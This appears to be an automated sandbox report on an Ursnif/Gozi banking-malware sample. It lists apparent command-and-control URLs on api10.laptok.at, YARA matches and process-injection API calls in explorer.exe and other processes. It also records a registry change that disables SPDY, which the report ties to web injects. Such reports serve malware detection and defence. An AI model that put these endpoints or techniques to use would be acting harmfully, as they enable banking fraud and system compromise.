HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 23:58:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: regsvr32.exe, 00000002.00000003.779376557.000000000362E000.00000004.00000001.sdmp, explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN
Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.859665043.000001F6C8B31000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000020.00000002.1020876214.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000017.00000003.858426776.000001F6E137C000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000020.00000000.844032000.000000000A897000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F4F73 GetProcAddress,NtCreateSection,memset,	2_2_033F4F73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_033F11A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F34D0 NtMapViewOfSection,	2_2_033F34D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033FB159 NtQueryVirtualMemory,	2_2_033FB159
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	32_2_04DAC458
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA1C74 NtQuerySystemInformation,	32_2_04DA1C74
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC9584 NtReadVirtualMemory,	32_2_04DC9584
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA7D44 NtQueryInformationProcess,	32_2_04DA7D44
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC1EEC NtCreateSection,	32_2_04DC1EEC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	32_2_04DAF640
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBEF14 NtMapViewOfSection,	32_2_04DBEF14
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCF9A4 NtAllocateVirtualMemory,	32_2_04DCF9A4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCC130 NtWriteVirtualMemory,	32_2_04DCC130
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB1A9C RtlAllocateHeap,NtQueryInformationProcess,	32_2_04DB1A9C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,	32_2_04DB2BD8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC9B4C NtQueryInformationProcess,	32_2_04DC9B4C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	32_2_04DE1002
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCF9A4 NtAllocateVirtualMemory,	33_2_00DCF9A4
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCC130 NtWriteVirtualMemory,	33_2_00DCC130
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB1A9C NtQueryInformationProcess,	33_2_00DB1A9C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	33_2_00DB2BD8
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC9B4C NtQueryInformationProcess,	33_2_00DC9B4C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	33_2_00DAC458
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC9584 NtReadVirtualMemory,	33_2_00DC9584
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC1EEC NtCreateSection,	33_2_00DC1EEC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,	33_2_00DAF640
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBEF14 NtMapViewOfSection,	33_2_00DBEF14
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	33_2_00DE1002
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4359B4C NtQueryInformationProcess,	35_2_000001E7A4359B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433F640 NtQueryInformationToken,NtQueryInformationToken,NtClose,	35_2_000001E7A433F640
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4371002 NtProtectVirtualMemory,NtProtectVirtualMemory,	35_2_000001E7A4371002

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033FAF34	2_2_033FAF34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F28E9	2_2_033F28E9
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA74A8	32_2_04DA74A8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAC458	32_2_04DAC458
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC9C04	32_2_04DC9C04
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB3438	32_2_04DB3438
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB7500	32_2_04DB7500
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA3F98	32_2_04DA3F98
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB5890	32_2_04DB5890
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB2854	32_2_04DB2854
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA42CC	32_2_04DA42CC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBAACC	32_2_04DBAACC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAEBD0	32_2_04DAEBD0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB6B80	32_2_04DB6B80
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB44FC	32_2_04DB44FC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DADC88	32_2_04DADC88
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC1C68	32_2_04DC1C68
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCD468	32_2_04DCD468
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC7DDC	32_2_04DC7DDC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA559C	32_2_04DA559C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC75B4	32_2_04DC75B4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC15A0	32_2_04DC15A0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC0D40	32_2_04DC0D40
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCED7C	32_2_04DCED7C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA9514	32_2_04DA9514
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB1D14	32_2_04DB1D14
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA1D20	32_2_04DA1D20
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBBE9C	32_2_04DBBE9C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCEFD0	32_2_04DCEFD0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB97C8	32_2_04DB97C8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB4F5C	32_2_04DB4F5C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBEF7C	32_2_04DBEF7C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB2F1C	32_2_04DB2F1C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA78F0	32_2_04DA78F0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCE09C	32_2_04DCE09C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB386C	32_2_04DB386C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB206C	32_2_04DB206C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBE808	32_2_04DBE808
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCE038	32_2_04DCE038
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB11DC	32_2_04DB11DC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA49BC	32_2_04DA49BC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC0294	32_2_04DC0294
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCFA10	32_2_04DCFA10
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC6A28	32_2_04DC6A28
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC2BD8	32_2_04DC2BD8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC53D4	32_2_04DC53D4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB3BF4	32_2_04DB3BF4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA2B40	32_2_04DA2B40
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB0304	32_2_04DB0304
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB5890	33_2_00DB5890
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB6B80	33_2_00DB6B80
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAC458	33_2_00DAC458
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA78F0	33_2_00DA78F0
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCE09C	33_2_00DCE09C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB2854	33_2_00DB2854
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB386C	33_2_00DB386C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB206C	33_2_00DB206C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBE808	33_2_00DBE808
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCE038	33_2_00DCE038
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB11DC	33_2_00DB11DC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA49BC	33_2_00DA49BC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA42CC	33_2_00DA42CC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBAACC	33_2_00DBAACC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC0294	33_2_00DC0294
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCFA10	33_2_00DCFA10
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC6A28	33_2_00DC6A28
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC2BD8	33_2_00DC2BD8
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC53D4	33_2_00DC53D4
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAEBD0	33_2_00DAEBD0
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB3BF4	33_2_00DB3BF4
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA2B40	33_2_00DA2B40
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB0304	33_2_00DB0304
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB44FC	33_2_00DB44FC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DADC88	33_2_00DADC88
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA74A8	33_2_00DA74A8
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC1C68	33_2_00DC1C68
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCD468	33_2_00DCD468
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC9C04	33_2_00DC9C04
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB3438	33_2_00DB3438
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC7DDC	33_2_00DC7DDC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA559C	33_2_00DA559C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC75B4	33_2_00DC75B4
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC15A0	33_2_00DC15A0
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC0D40	33_2_00DC0D40
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCED7C	33_2_00DCED7C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA9514	33_2_00DA9514
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB1D14	33_2_00DB1D14
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB7500	33_2_00DB7500
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA1D20	33_2_00DA1D20
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBBE9C	33_2_00DBBE9C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCEFD0	33_2_00DCEFD0
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB97C8	33_2_00DB97C8
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA3F98	33_2_00DA3F98
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB4F5C	33_2_00DB4F5C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBEF7C	33_2_00DBEF7C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB2F1C	33_2_00DB2F1C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4346B80	35_2_000001E7A4346B80
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4345890	35_2_000001E7A4345890
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43349BC	35_2_000001E7A43349BC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43411DC	35_2_000001E7A43411DC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4356A28	35_2_000001E7A4356A28
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435FA10	35_2_000001E7A435FA10
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4350294	35_2_000001E7A4350294
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4340304	35_2_000001E7A4340304
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A434AACC	35_2_000001E7A434AACC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43342CC	35_2_000001E7A43342CC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4332B40	35_2_000001E7A4332B40
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4359C04	35_2_000001E7A4359C04
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4343BF4	35_2_000001E7A4343BF4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4352BD8	35_2_000001E7A4352BD8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43553D4	35_2_000001E7A43553D4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433EBD0	35_2_000001E7A433EBD0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4343438	35_2_000001E7A4343438
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4351C68	35_2_000001E7A4351C68
